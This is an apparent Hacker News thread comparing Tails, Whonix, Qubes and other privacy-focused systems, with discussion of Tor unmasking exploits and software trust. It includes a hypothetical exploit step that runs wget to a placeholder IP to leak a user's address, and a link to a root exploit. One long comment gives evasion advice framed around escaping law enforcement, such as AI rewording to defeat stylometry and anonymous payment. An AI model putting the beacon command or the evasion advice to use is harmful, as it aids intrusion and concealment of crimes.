Tails is a portable OS that protects against surveillance and censorship
tails.net
tails.net
I switched off of Qubes last year to my own Alpine chroot with a hand crafted kernel and initrd that lives only in memory. I find turning off the computer when I'm finished and having it forget everything to be a very peaceful way to compute. I owe the internet a write up.
I feel like ramfs for root filesystems is an underused pattern more broadly. "Want to upgrade? Just reboot. Fallback? Pick a different root squashfs in the grub menu"
I would definitely be interested in reading more about this.
I love the idea of being able to prevent an application from writing all over my disk to random places. If I can't prevent it, I can at least remedy it by having all those changes go away with a reboot.
One of the things I love about Docker containers is that they can be ephemeral or persistent, short or long term, have full network access or no access, allowed to write to the host system or stuck writing to its own file system only.
I'm in control instead of the application.
I was thinking of it for a home firewall at the time, but in any case, it made for a very ephemeral system.
my whole PDE (Personal Developer Environment) is within a container. Need python? Shell into (via dmenu) python container. All with complete neovim setup. Need a GUI? No problem. Spawn a container. My lxd profile is set up for this. Use chezmoi for heavy automated stuff.
My base alpine system always stays clean.
Everything that I care about just works and I get a separation of concerns. Use of network namespaces allows further flexibility. For example, I have a netns that is forced through a Tor gateway such that any traffic originating in it can only go through Tor.
This type of setup is not hardened against kernel vulnerabilities, the kernel treats applications running in namespaces as if they are isolated from other namespaces but those applications can still interact with broad surfaces of the kernel and therefore potentially exploit it.
For kernel safety applications must be denied direct access to the host kernel, this is usually achieved with virtual machines.
And that is what QubesOS does, if I understand correctly?
I think one reason might be musl and its compatibility.
My desktop is FreeBSD but I have a few alpine servers for docker and other Linux specific stuff.
And FreeBSD is even less Gnu-Linux compatible than Alpine yet everything works fine. Thanks to an army of port maintainers of course.
https://gist.github.com/kspacewalk/52ea8f0c383f57a34042db2a0...
Access via http://localhost:8080/vnc.html
From my neomvim container I can use the local terminal or I can ssh to the host to run my other containers.
Same. When I was looking for a minimalistic distro, while unorthodox it seemed better than the alternatives. My next choice would be Void but I ran into some issues with it, and Alpine worked much more flawlessly.
https://nixos.wiki/wiki/Impermanence
Also NixOs has absurd levels of control for upgrades, rollbacks, and control over the build and resulting files.
$ smol@computer ~> du -hcs /nix/store/
257G /nix/store/I have 45G, and this computer is more than two years old
It's totally worth the stability, but maybe not the best choice for the storage-constrained.
EDIT: According to nix-tree my current generation is only 45gb right now.
When I switched from Debian to NixOS a few years ago, I installed it on a separate subvolume, and it ended up taking almost exactly as much space as Debian did (about 12 GiB with gnome and everything else). And really, what would you expect? It's nearly all the same code, just organized differently in the filesystem.
P.S., you can check the store usage of the current system profile with `nix path-info -Sh /run/current-system`.
(Tried Qubes as written up in [1] but eventually gave up as it won't allow me to create virtualbox images, and some other caveats, as well as being pretty resource hungry)
What's the use case[1] for VirtualBox images in an operating system designed around virtualization with Xen? You can simply create a Xen VM.
[1]: Note that I'm asking a question here, not invalidating your experience.
How do you deal with stuff you want to store in /home? (Like source code checkouts, ssh keys, etc.)
I suggest looking into Whonix[1] if you want something that you can truly use for privacy. It is also much more secure than Tails by design, and does not have any limitations like locking down the root user account.
Summary from GitHub:
"Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP."
I've commented in this thread that at one point, such a vulnerability was left unpatched in Tails for years despite being documented and a PoC existing.
Whonix on the other uses two VMs, one of which runs Tor and the other applications, and connects via an internal network. This means that non-Tor connections are impossible, as the VM where you run software is completely unaware of the real, external IP.
This raises the level of exploit needed substantially, from user to root, to remote kernel exploits or hypervisor escapes.
I wrote up our security procedures here: https://news.ycombinator.com/item?id=37346620
The reason Tails isn't an option is because, as others have mentioned, there have been Tor browser exploits which reveal the IP address of the Tails user. While this is unlikely for our case, it's important to approach security from first principles with threat modeling. An attack from the FBI may seem unlikely today, but both Silk Road and one of its successors were taken down by mistakes they made when setting up their site. Learning from history, if you're not careful early, you're in for a surprise later.
Case in point: When I started Whonix Workstation to post this comment, the Whonix Gateway VM failed to boot. So when I tried to start Tor Browser and go to https://news.ycombinator.com, all I saw was a connection error. This kind of layered defense is essential if you're serious about staying out of jail.
Realistically, you'll likely dox yourself through some other means: sending Bitcoin to your pseudonym from your real identity, admitting to someone you know that you control your pseudonym (this work gets lonely, so this is a real temptation), or even accidentally signing off an email with "Thanks, [your real name]". And once you make a single mistake, you can never recover.
Day to day browsing is a pain. I use a VNC client to remote into our server, which is running a desktop environment with a regular browser. That way you can use apps (gmail, discord, etc) from outside the Tor network. But since you're tunneling through Tor, this is painfully slow. You'll likely want to type out long messages in Whonix, then copy-paste into your remote session. Each keystroke can sometimes take a full second to appear when animations are heavy.
Transferring large amounts of data is also painful. If you try to start Litecoin Core on Whonix, you'll need to sync more than 30 GB, which can take a very long time.
Patience is your weapon. You have all the time in the world not to make a mistake, and moments to make a fatal one. Think carefully about everything you do.
Stylometry scares me. AI can help here: run an assistant locally, and ask it to reword everything you write. You won't be able to use ChatGPT for this, obviously because OpenAI retains a history of everything you submit, but also because they require a real phone number to sign up. And you can't get a real number through any means I've found so far.
Payment is also a pain. I'm hoping to ask the community to donate Vanilla gift cards so that I can sign up for Tarsnap or spin up a droplet.
By applying the discipline normally found in aeronautics, I think it's possible to do this safely. But you'll still be risking jail time, and the intersection of people who want to do something for altruistic reasons and willing to risk prison is pretty small. I'll be documenting everything I do so that you can learn from my example, or perhaps from my mistakes.
I too am a fellow qube herder. After having discovered Qubes OS, I've never wanted to go back!
What does Shinjiru do if they receive a DMCA notice?
When I ran a huge private torrent tracker I paid a decent chunk to get a host that ignored every single request of any type that they received.
If you're not actually worried that DMCA people will follow through on their threat to sue you, or you really want to risk losing your property in the event of a lawsuit, then perhaps this might work.
Feel free to email me for more advice or to keep in touch. Your project sounds interesting.
Other related projects are whonix ( https://www.whonix.org ), which consists of two virtual machines:
A workstation to work on and a gateway, which torifies all traffic from the workstation VM.
Whonix is also integrated in Qubes OS ( https://www.qubes-os.org ), which allows you to easily work with multiple seperate whonix VMs. There is also the possibility to tunnel all internet traffic of your machine through Tor including system upgrades of the host OS itself.
To clarify the benefits of the "two VM" approach:
Most of the unmasking exploits against Tor users (as distinguished from unmasking Tor hidden services) involve getting a browser to ignore the proxy settings, somehow. I believe WebRTC, Flash, and various other things have been used to cause the browser to beacon out to some endpoint - you exploit the kitty picture site, and put in code to exploit the browser, which then makes a direct request to http://someip/unique_identifier - and, boom, you've got the user's IP, probable cause, the works.
This happens because a "typical" Tor install is the daemon running locally, but nothing prevents other binaries from making a direct connection out. You set the browser to use socks5://localhost:9050 or something as the proxy, but if you can either get some part of it to misbehave, or just spawn off a different process, it doesn't obey the proxy settings and goes straight out.
Whonix solves this problem by splitting the system into the workstation VM (what you interact with) and the gateway VM (that connects to Tor and "torifies" traffic). The only network port on the workstation VM is connected to the input port on the gateway VM - and everything coming in that port is routed through Tor, via the other (internet connected) port.
So, if you manage to exploit the workstation VM, the attacker still doesn't gain an IP - because they launch a shell that runs 'wget http://someip/unique_id', but that goes out through the gateway VM, and gets encapsulated into Tor before going out, so it still pops out some Tor exit node, not your home IP address.
It raises the bar rather substantially for using Tor, and avoids a lot of the various ways to get Tor to leak. Also, they ship a copy of the Tor Browser in Whonix, which disables a lot of high risk functionality and allows you to very easily disable automatic media parsing and Javascript and such.
Qubes is awesome, and the integrated Whonix stuff is just a beautiful integration.
Qubes-Whonix with fully ephemeral disposable VMs is the future. It would be a total killer for nearly every use case of Tails besides ease of use.
Note that this is in the works, but not fully implemented by default yet. https://github.com/anywaydense/QubesEphemerize
> The steps below outline how to make all PVH DispVM's permanently fully ephemeral. All data written to the disk will be encrypted with an ephemeral encryption key only stored in RAM. The encryption and encryption key generation is handled by dom0 and is thus inaccessible to the VM.
My outsiders’ perspective is that the threat model for these kinds of surveillance resistant tools is somewhat perverse: they trade indistinguishability (being lost in the crowd) for a nominally more anonymous but extremely unusual datapoint (a host/browser/etc. that basically looks like no other normal machine.)
Put another way: without a clear attacker in mind, my outsiders’ perspective is that Tails feels a bit like wearing a paper bag in public to foil public CCTV: it might work, but is far likely to provoke contact with the relevant authorities than just attempting to blend in.
https://www.insider.com/russian-influencer-veronika-loginova...
In which case, it should be pretty secure.
Although, there's the obvious 'honeypot' concern.
But maybe I'm thinking of another distro, that ran from RAM and didn't write anything to disk.
This is not true by any means. A "switch" to I2P never happened, and just a few months ago an exploit[1] that could deanonymize eepsites was published. Tor is still the only "method of browsing the darknet"; by most definitions.
The 'honeypot' concern is somehow valid because full-on privacy on the internet is as hard to achieve as privacy in a public park. Only its user can determine if their online activities goes against the (legal/moral/financial) interests of the most technically-advanced nation on our planet.
To be clear, I'm a fan of the product -- just wondering what the other side of the story is.
What information do you have to the contrary?
Assuming there was an exploit that broke out of the Firefox sand box you are correct that any connection is via tor.
Though tails isn't 100% sure, you could chain a Firefox cve + user land to root and then turn off the to routing rules.
One that comes to mind is dirty sock[0]. It uses a vulnerability in the snap api to create a root user.
https://github.com/initstring/dirty_sock/blob/master/dirty_s...
[1] https://www.vice.com/en/article/v7gd9b/facebook-helped-fbi-h...
but yeah probably going to prioritize Qubes and whonix again.
> The Unsafe Browser allows to retrieve the public IP address by a compromised amnesia user with no user interaction
https://www.youtube.com/watch?v=mVKAyw0xqxw
Short and informative :-)
I suspect you're better off with a more obscure project, because then your adversary is less likely to have a 'ready to go' exploit.
Ideally, there would be a few tails-style projects competing with each other (there are; see sibling threads), and the internet would be more federated (for instance, if github is completely compromised right now, many people reading this will git pull malware in the next day or so).
In addition, even if people are looking, finding defects is really hard. A random onlooker has basically a 0% chance to find most of the critical zero-days afflicting Linux. It takes weeks to months of dedicated effort by technical experts with domain knowledge to find most such bugs. "Many eyes" is worthless to security, what you need is many trained technical experts with domain knowledge using high quality techniques and processes derived from successful high security projects.
This is not to say that "security through obscurity" is a good thing or that "open source" has no impact. Open source and development does have a large impact, it is just mostly on your ability to trust the auditing/security process as a random third-party, not the security itself. The security itself demands focused technical ability. However, the ability to trust the security claims derives from a technical evaluation by a technically competent, trusted party. The easiest way to do that if you are technically competent is to do it yourself. However, few people have that sort of time, so you farm out the work. If you are a big company or the government, you can usually get access to the source code under appropriate contractual protection, then you have your own technical staff (technically competent, trusted party) do the evaluation. If you are a smaller company, you might not have any technical staff appropriate for the task so you farm it out to a testing body (technically competent) who can probably be trusted since you are paying them.
However, if you are just some random person, you do not have the money to pay for a evaluation and you have no way of knowing if "Totally Not the NSA Certification Company" can be trusted. So, your best bet is inherent transparency and hoping that the unaffiliated lookers are, on average, not your enemy and technically competent. This is a okay option if you do not have access to better choices, and certainly better than nothing, but is a far cry from the other options where you have real control, incentive alignment, and insight into auditing processes. Only a organization incompetent at security would not use one of the better options for critical dependencys. Unfortunately, basically every large commercial IT organization, such as Google, Microsoft, Apple, Amazon, Crowdstrike, etc. is incompetent at security and none of them actually evaluate their dependencies or do any meaningful third-party certifications.
Funnily enough, this means my advice is practically useless, because the security of everybody is completely untrustworthy. Your only hope is "many eyes" because that is the only way to get any trustable audit at all. In the physical industries you have standards and certification bodies worth more than the paper they are written on, but in software everything in security is total snake oil and you should only believe what you can see for yourself. Hope that helps.
I think this is somewhat sarcastic but the article goes as far as saying "[Tor Browser Bundle] is the only reason that FireFox is a valuable target." Firefox has improved sandboxing now though I don't think it's as good as Chromium.
- Set unbound with DNS over HTTP.
- Use Links+ with Tor/i2pd and enforcing all the connections to the proxy in the settings. Avoid the web for news sites and use Gemini with offpunk and gemini://gemi.dev for news sources Bookmark the news sites and sync. Then, reading the news offline it's easy. Offpunk has a command for that, 'offline', and then run 'list', it will show up your cached bookmarks.
- Use nncpgo and sneakernet (or any inet protocol on top) to share data between the machines you own.
- News are better being fetched and read online with sfeed and lynx. Ditto with email with mbsync/msmtp + Mutt. Also, Gopher and Gemini, to read all the nice sites offline. Fetch your news/posts offline and forget.
- Use keyboard locked (u)xterms with TMUX. Nsxiv and mpv for images/videos. Better if you run them under the framebuffer.
- Convert all the PDF's you have to DJVU with the highest settings, then use gzip or xz on it, with DJView as the viewer. The less code you run, the better.
- Avoid Brave, Chromium, or worse, Edge.
The versions ready for download may be based on code slightly different than the one in the repo -either deliberetely, or because the NSA managed to redirect the download link to its' servers.
There is always a probability that an anonymity product will be proved to be a honeypot. Even open source projects may either do as mentioned (provide a "hacked" version for downloading), or even include some code that downloads and runs a seemingly harmless module from an external source, that is not so harmless in reality.
If the CIA gives enough money to the core developers or even just the website owner, what do they have to lose? Their reputation? Not everyone cares about that.
I know these scenarios sound far-fetched and paranoid, but nothing should sound impossible after Snowden's revelations. Even for open source software.
That's probably true, but if you want to be really paranoid you'd also want to be sure to compile it with a machine, operating system, and compiler that they are unlikely to have tampered with. Maybe something really old or esoteric or both?
Why specify "open source software"? Is it not true of ALL software?
"Unless you reviewed the source code AND built the binary from it, no software is to be trusted."
That seems to be more accurate. Am I missing something?
Basically about all something needs to be to be called an OS is a kernel and at least one userspace program that does something useful, so I’d definitely say every ‘Linux distribution’ has always counted as an operating system in itself (so ‘Linux distribution’ is just a specific subset of ‘operating systems’).
I’m not sure that it’s a widely accepted definition, but it’s often useful to describe what a software depends on. Does it require _just_ Linux, or does it also require glibc?
Some distributions are operating systems (eg: OpenBSD, ArchLinux, Debian). Some operating systems are not distributions (they don’t include a mechanism to pull packages. Eg: windows, macOS). Some distributions are not operating systems (eg: homebrew, Flatpak).
Tails focuses on the operating system side of things. It’s focus isn’t on package distribution and letting you install things, but on downloading a usable OS image. It’s still a distribution, but that’s more of a technicality.
I find that even combinations that are supposed to be very similar (Linux kernel, same DE, same repos) can behave differently, and I guess this is because of how the distro maintainers set up the different parts and integrations in the system. So in this way, my MX Linux box is different from my Debian+KDE box.
Over the past two years Tails has received 500k USD in bitcoin alone:
https://www.blockchain.com/explorer/addresses/btc/bc1qjg53lw...
You can also surmise that they receive ~200k/yr from official sponsors:
https://tails.net/sponsors/index.en.html
Then you have all the paypal, bank, cash donations.
Is it enough to add support for a second arch that is fully supported upstream (they ship a customized Debian)? You decide.
However, assuming the source is easily bootstrappable, someone should try producing an unofficial port to Arm and Risc V. I'm sure it would reveal some security holes, even if it isn't appropriate (yet) for tails' target audience.
I used to use Dread and various DNM forums to find people to talk with and read their threads. It was usually far more complex and nuanced than what I would find on clearnet
but its been like 2-3 years since any Tor services even worked reliably with this ongoing DDOS attack.
dark.fail has been down too
I hear people moved to i2p but WHERE?
https://console.cloud.google.com/marketplace/product/techlat...
I recently had to dust off tails to do some dark web research on a data breach.
It’s a great “prophylactic” to protect your assets from possible malware while doing research.
0. https://en.wikipedia.org/wiki/Lightweight_Portable_Security
Say I log into Facebook, obviously I expect my identity to be exposed to Facebook, but do any of those OS have the ability to keep me private after I logged into some website ?
- QubesOS provides security by isolating components. So if your browser VM is compromised, your password manager VM is not. That does not make you anonymous at all.
- I don't know Tails, but I think that it is just not persistent. Which means that when you reboot, you know that there are no traces of your previous session (as opposed to a "normal" system that would keep cookies, for instance). Which may help you not being tracked. That does not necessarily make you anonymous: you may leak your IP. I would guess that another thing is that if you get some malware in your Tails session and reboot, then the malware is supposedly gone (could it infect the hardware, e.g. a USB webcam? Not sure).
There is no "one" security, it depends a lot on what you need (i.e. your thread model), and many tools provide many different features.
What with the UK planning to pass that online safety bill, I decided to try out Whonix (which involved learning curves when it came to Linux), which I think is a better way of keeping safe online.
Like what?
Anecdotal evidence, but I've heard numerous complaints from other users about telemetry settings being enabled in the browser and locked.
But worst of all, it uses GNOME.
https://www.schneier.com/blog/archives/2020/06/facebook_help...
You can also set up your own exit/guard node and configure Tor accordingly. While not a recommended setup, it works pretty reliably.
Networking will be set up so the Chrome inner VM can ssh to the tor VM. The tor VM can access only some whitelisted tor nodes.
Now an adversary that uses a Chrome exploit needs to break out of Windows and 2 layers of VM's before they get to my host. Breaking out of a VM is fairly doable, but breaking out of two will require lots of zero-days chained together (expensive).
Same if they find an exploit in tor.
For that, just a run-of-the-mill firefox exploit is all that is needed, and suddenly exploit code can do a wifi scan and get a very precise location.
This is the discussion regarding support for ARM, it's currently not supported.
What are the main benefits you get from using Tails OS?
What downsides do you tolerate because of the benefits?
I see what you are saying, but AFAIK, the technology is neutral as far as good or bad goes. One could say it lets a person say and do things with less fear of consequences in general.
Providing limited protection from being deanonymized doesn't mean that you can no longer be censored.
To me, it seems like it can only have limited utility in this regard. For example, Tails (and Tor) isn't going to help you avoid private sector censorship on services like X or Facebook or YouTube, right? It won't help you get a book published or reach an audience with a video.
Tor/Tails can certainly help someone who is experiencing censorship to publish a book or distribute a video in a different region where that censorship does not exist. That bypasses the censorship. For example someone experiencing censorship could contact a publisher or distributor in a different location and transmit the book or video to them.
If censorship exists on Twitter, publishing items to Twitter isn't bypassing Twitter's censorship. You may be bypassing automated censorship or some mechanism but Twitter would still be censored.
The same goes for books. There's no tool that is going to keep a book on the shelves of a library that wants to burn the book. Bypassing the library's censorship means getting the book to readers despite the library's censorship.
I consider my personal setup to be pretty good, but not Tails grade privacy: 1. Avoid installing apps, use Safari with all possible privacy settings. 2. Run Lockdown mode iOS, iPadOS, and macOS. 3. Use duck duck go and ProtonMail. 4. Prefer to run in Safari private browsing tabs. 5. Become non-private when logging into Amazon to make a purchase, etc.
I would love it if people more knowledgeable than I could critique my setup, make suggestions. Thanks in advance.
I would like to mention Cory Doctorow’s excellent new book The Internet Con [1]. It carries on in the fine tradition of the books Surveillance Capitalism and Privacy is Power for the narrative that regular law abiding people also benefit from doubling down on privacy.
Tails runs on most computers. It doesn't have to be a "macOS" (you mean Apple?). macOS is an OS, tails replaces the OS.
But I understand the miscommunication, parent meant to say "of the Apple computers, it only runs on Intel ones". There is a world outside of Apple, you know :-)
Tails works on Intel arch. It does not work on ARM arch.
This has nothing to do with an Apple branded computer.
If you only have an ARM Mac, it's easy to get an old IBM-compatible laptop and run Tails. What matters is a decent speed of USB stick, and today they're generally decent. I find it helpful for testing some things, I can reboot and get to a known state.
If you want better protection for websites identifying you, you should consider researching on browser fingerprinting (which is extremely hard, if not impossible to do on Safari). If you want better protection overall, ditch Apple.